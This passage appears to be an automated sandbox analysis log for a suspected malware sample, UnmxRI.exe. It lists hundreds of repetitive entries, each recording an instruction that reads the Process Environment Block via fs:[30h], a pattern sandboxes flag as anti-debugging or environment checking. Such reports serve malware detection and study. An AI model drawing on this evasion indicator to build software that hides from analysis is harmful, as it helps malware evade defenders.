                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195A456 mov eax, dword ptr fs:[00000030h]9_2_0195A456
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189645D mov eax, dword ptr fs:[00000030h]9_2_0189645D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C245A mov eax, dword ptr fs:[00000030h]9_2_018C245A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C460 mov ecx, dword ptr fs:[00000030h]9_2_0192C460
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CA470 mov eax, dword ptr fs:[00000030h]9_2_018CA470
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CA470 mov eax, dword ptr fs:[00000030h]9_2_018CA470
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CA470 mov eax, dword ptr fs:[00000030h]9_2_018CA470
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194678E mov eax, dword ptr fs:[00000030h]9_2_0194678E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A07AF mov eax, dword ptr fs:[00000030h]9_2_018A07AF
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019547A0 mov eax, dword ptr fs:[00000030h]9_2_019547A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AC7C0 mov eax, dword ptr fs:[00000030h]9_2_018AC7C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019207C3 mov eax, dword ptr fs:[00000030h]9_2_019207C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C27ED mov eax, dword ptr fs:[00000030h]9_2_018C27ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C27ED mov eax, dword ptr fs:[00000030h]9_2_018C27ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C27ED mov eax, dword ptr fs:[00000030h]9_2_018C27ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A47FB mov eax, dword ptr fs:[00000030h]9_2_018A47FB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A47FB mov eax, dword ptr fs:[00000030h]9_2_018A47FB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192E7E1 mov eax, dword ptr fs:[00000030h]9_2_0192E7E1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC700 mov eax, dword ptr fs:[00000030h]9_2_018DC700
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0710 mov eax, dword ptr fs:[00000030h]9_2_018A0710
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D0710 mov eax, dword ptr fs:[00000030h]9_2_018D0710
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191C730 mov eax, dword ptr fs:[00000030h]9_2_0191C730
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC720 mov eax, dword ptr fs:[00000030h]9_2_018DC720
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC720 mov eax, dword ptr fs:[00000030h]9_2_018DC720
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D273C mov eax, dword ptr fs:[00000030h]9_2_018D273C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D273C mov ecx, dword ptr fs:[00000030h]9_2_018D273C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D273C mov eax, dword ptr fs:[00000030h]9_2_018D273C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D674D mov esi, dword ptr fs:[00000030h]9_2_018D674D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D674D mov eax, dword ptr fs:[00000030h]9_2_018D674D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D674D mov eax, dword ptr fs:[00000030h]9_2_018D674D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01924755 mov eax, dword ptr fs:[00000030h]9_2_01924755
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192E75D mov eax, dword ptr fs:[00000030h]9_2_0192E75D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0750 mov eax, dword ptr fs:[00000030h]9_2_018A0750
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2750 mov eax, dword ptr fs:[00000030h]9_2_018E2750
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2750 mov eax, dword ptr fs:[00000030h]9_2_018E2750
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8770 mov eax, dword ptr fs:[00000030h]9_2_018A8770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A4690 mov eax, dword ptr fs:[00000030h]9_2_018A4690
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A4690 mov eax, dword ptr fs:[00000030h]9_2_018A4690
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC6A6 mov eax, dword ptr fs:[00000030h]9_2_018DC6A6
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D66B0 mov eax, dword ptr fs:[00000030h]9_2_018D66B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA6C7 mov ebx, dword ptr fs:[00000030h]9_2_018DA6C7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA6C7 mov eax, dword ptr fs:[00000030h]9_2_018DA6C7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E6F2 mov eax, dword ptr fs:[00000030h]9_2_0191E6F2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E6F2 mov eax, dword ptr fs:[00000030h]9_2_0191E6F2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E6F2 mov eax, dword ptr fs:[00000030h]9_2_0191E6F2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E6F2 mov eax, dword ptr fs:[00000030h]9_2_0191E6F2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019206F1 mov eax, dword ptr fs:[00000030h]9_2_019206F1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019206F1 mov eax, dword ptr fs:[00000030h]9_2_019206F1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2619 mov eax, dword ptr fs:[00000030h]9_2_018E2619
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E609 mov eax, dword ptr fs:[00000030h]9_2_0191E609
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A262C mov eax, dword ptr fs:[00000030h]9_2_018A262C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE627 mov eax, dword ptr fs:[00000030h]9_2_018BE627
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D6620 mov eax, dword ptr fs:[00000030h]9_2_018D6620
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D8620 mov eax, dword ptr fs:[00000030h]9_2_018D8620
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BC640 mov eax, dword ptr fs:[00000030h]9_2_018BC640
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA660 mov eax, dword ptr fs:[00000030h]9_2_018DA660
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA660 mov eax, dword ptr fs:[00000030h]9_2_018DA660
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196866E mov eax, dword ptr fs:[00000030h]9_2_0196866E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196866E mov eax, dword ptr fs:[00000030h]9_2_0196866E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D2674 mov eax, dword ptr fs:[00000030h]9_2_018D2674
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019289B3 mov esi, dword ptr fs:[00000030h]9_2_019289B3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019289B3 mov eax, dword ptr fs:[00000030h]9_2_019289B3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019289B3 mov eax, dword ptr fs:[00000030h]9_2_019289B3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A09AD mov eax, dword ptr fs:[00000030h]9_2_018A09AD
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A09AD mov eax, dword ptr fs:[00000030h]9_2_018A09AD
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196A9D3 mov eax, dword ptr fs:[00000030h]9_2_0196A9D3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019369C0 mov eax, dword ptr fs:[00000030h]9_2_019369C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D49D0 mov eax, dword ptr fs:[00000030h]9_2_018D49D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192E9E0 mov eax, dword ptr fs:[00000030h]9_2_0192E9E0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D29F9 mov eax, dword ptr fs:[00000030h]9_2_018D29F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D29F9 mov eax, dword ptr fs:[00000030h]9_2_018D29F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C912 mov eax, dword ptr fs:[00000030h]9_2_0192C912
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01898918 mov eax, dword ptr fs:[00000030h]9_2_01898918
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01898918 mov eax, dword ptr fs:[00000030h]9_2_01898918
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E908 mov eax, dword ptr fs:[00000030h]9_2_0191E908
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E908 mov eax, dword ptr fs:[00000030h]9_2_0191E908
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192892A mov eax, dword ptr fs:[00000030h]9_2_0192892A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0193892B mov eax, dword ptr fs:[00000030h]9_2_0193892B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01920946 mov eax, dword ptr fs:[00000030h]9_2_01920946
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974940 mov eax, dword ptr fs:[00000030h]9_2_01974940
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E096E mov eax, dword ptr fs:[00000030h]9_2_018E096E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E096E mov edx, dword ptr fs:[00000030h]9_2_018E096E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E096E mov eax, dword ptr fs:[00000030h]9_2_018E096E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01944978 mov eax, dword ptr fs:[00000030h]9_2_01944978
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01944978 mov eax, dword ptr fs:[00000030h]9_2_01944978
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C6962 mov eax, dword ptr fs:[00000030h]9_2_018C6962
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C6962 mov eax, dword ptr fs:[00000030h]9_2_018C6962
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C6962 mov eax, dword ptr fs:[00000030h]9_2_018C6962
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C97C mov eax, dword ptr fs:[00000030h]9_2_0192C97C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0887 mov eax, dword ptr fs:[00000030h]9_2_018A0887
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C89D mov eax, dword ptr fs:[00000030h]9_2_0192C89D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE8C0 mov eax, dword ptr fs:[00000030h]9_2_018CE8C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019708C0 mov eax, dword ptr fs:[00000030h]9_2_019708C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196A8E4 mov eax, dword ptr fs:[00000030h]9_2_0196A8E4
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC8F9 mov eax, dword ptr fs:[00000030h]9_2_018DC8F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC8F9 mov eax, dword ptr fs:[00000030h]9_2_018DC8F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C810 mov eax, dword ptr fs:[00000030h]9_2_0192C810
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194483A mov eax, dword ptr fs:[00000030h]9_2_0194483A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194483A mov eax, dword ptr fs:[00000030h]9_2_0194483A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2835 mov eax, dword ptr fs:[00000030h]9_2_018C2835
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2835 mov eax, dword ptr fs:[00000030h]9_2_018C2835
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2835 mov eax, dword ptr fs:[00000030h]9_2_018C2835
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2835 mov ecx, dword ptr fs:[00000030h]9_2_018C2835
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2835 mov eax, dword ptr fs:[00000030h]9_2_018C2835
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2835 mov eax, dword ptr fs:[00000030h]9_2_018C2835
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA830 mov eax, dword ptr fs:[00000030h]9_2_018DA830
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B2840 mov ecx, dword ptr fs:[00000030h]9_2_018B2840
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A4859 mov eax, dword ptr fs:[00000030h]9_2_018A4859
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A4859 mov eax, dword ptr fs:[00000030h]9_2_018A4859
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D0854 mov eax, dword ptr fs:[00000030h]9_2_018D0854
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192E872 mov eax, dword ptr fs:[00000030h]9_2_0192E872
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192E872 mov eax, dword ptr fs:[00000030h]9_2_0192E872
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01936870 mov eax, dword ptr fs:[00000030h]9_2_01936870
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01936870 mov eax, dword ptr fs:[00000030h]9_2_01936870
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01954BB0 mov eax, dword ptr fs:[00000030h]9_2_01954BB0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01954BB0 mov eax, dword ptr fs:[00000030h]9_2_01954BB0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0BBE mov eax, dword ptr fs:[00000030h]9_2_018B0BBE
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0BBE mov eax, dword ptr fs:[00000030h]9_2_018B0BBE
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194EBD0 mov eax, dword ptr fs:[00000030h]9_2_0194EBD0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C0BCB mov eax, dword ptr fs:[00000030h]9_2_018C0BCB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C0BCB mov eax, dword ptr fs:[00000030h]9_2_018C0BCB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C0BCB mov eax, dword ptr fs:[00000030h]9_2_018C0BCB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0BCD mov eax, dword ptr fs:[00000030h]9_2_018A0BCD
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0BCD mov eax, dword ptr fs:[00000030h]9_2_018A0BCD
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0BCD mov eax, dword ptr fs:[00000030h]9_2_018A0BCD
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192CBF0 mov eax, dword ptr fs:[00000030h]9_2_0192CBF0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CEBFC mov eax, dword ptr fs:[00000030h]9_2_018CEBFC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8BF0 mov eax, dword ptr fs:[00000030h]9_2_018A8BF0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8BF0 mov eax, dword ptr fs:[00000030h]9_2_018A8BF0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8BF0 mov eax, dword ptr fs:[00000030h]9_2_018A8BF0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191EB1D mov eax, dword ptr fs:[00000030h]9_2_0191EB1D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191EB1D mov eax, dword ptr fs:[00000030h]9_2_0191EB1D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191EB1D mov eax, dword ptr fs:[00000030h]9_2_0191EB1D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191EB1D mov eax, dword ptr fs:[00000030h]9_2_0191EB1D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191EB1D mov eax, dword ptr fs:[00000030h]9_2_0191EB1D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191EB1D mov eax, dword ptr fs:[00000030h]9_2_0191EB1D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191EB1D mov eax, dword ptr fs:[00000030h]9_2_0191EB1D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191EB1D mov eax, dword ptr fs:[00000030h]9_2_0191EB1D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191EB1D mov eax, dword ptr fs:[00000030h]9_2_0191EB1D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974B00 mov eax, dword ptr fs:[00000030h]9_2_01974B00
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CEB20 mov eax, dword ptr fs:[00000030h]9_2_018CEB20
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CEB20 mov eax, dword ptr fs:[00000030h]9_2_018CEB20
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01968B28 mov eax, dword ptr fs:[00000030h]9_2_01968B28
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01968B28 mov eax, dword ptr fs:[00000030h]9_2_01968B28
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01972B57 mov eax, dword ptr fs:[00000030h]9_2_01972B57
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01972B57 mov eax, dword ptr fs:[00000030h]9_2_01972B57
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01972B57 mov eax, dword ptr fs:[00000030h]9_2_01972B57
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01972B57 mov eax, dword ptr fs:[00000030h]9_2_01972B57
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194EB50 mov eax, dword ptr fs:[00000030h]9_2_0194EB50
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01936B40 mov eax, dword ptr fs:[00000030h]9_2_01936B40
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01936B40 mov eax, dword ptr fs:[00000030h]9_2_01936B40
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196AB40 mov eax, dword ptr fs:[00000030h]9_2_0196AB40
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01948B42 mov eax, dword ptr fs:[00000030h]9_2_01948B42
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01898B50 mov eax, dword ptr fs:[00000030h]9_2_01898B50
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01954B4B mov eax, dword ptr fs:[00000030h]9_2_01954B4B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01954B4B mov eax, dword ptr fs:[00000030h]9_2_01954B4B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189CB7E mov eax, dword ptr fs:[00000030h]9_2_0189CB7E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]9_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]9_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]9_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]9_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]9_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]9_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]9_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]9_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]9_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974A80 mov eax, dword ptr fs:[00000030h]9_2_01974A80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D8A90 mov edx, dword ptr fs:[00000030h]9_2_018D8A90
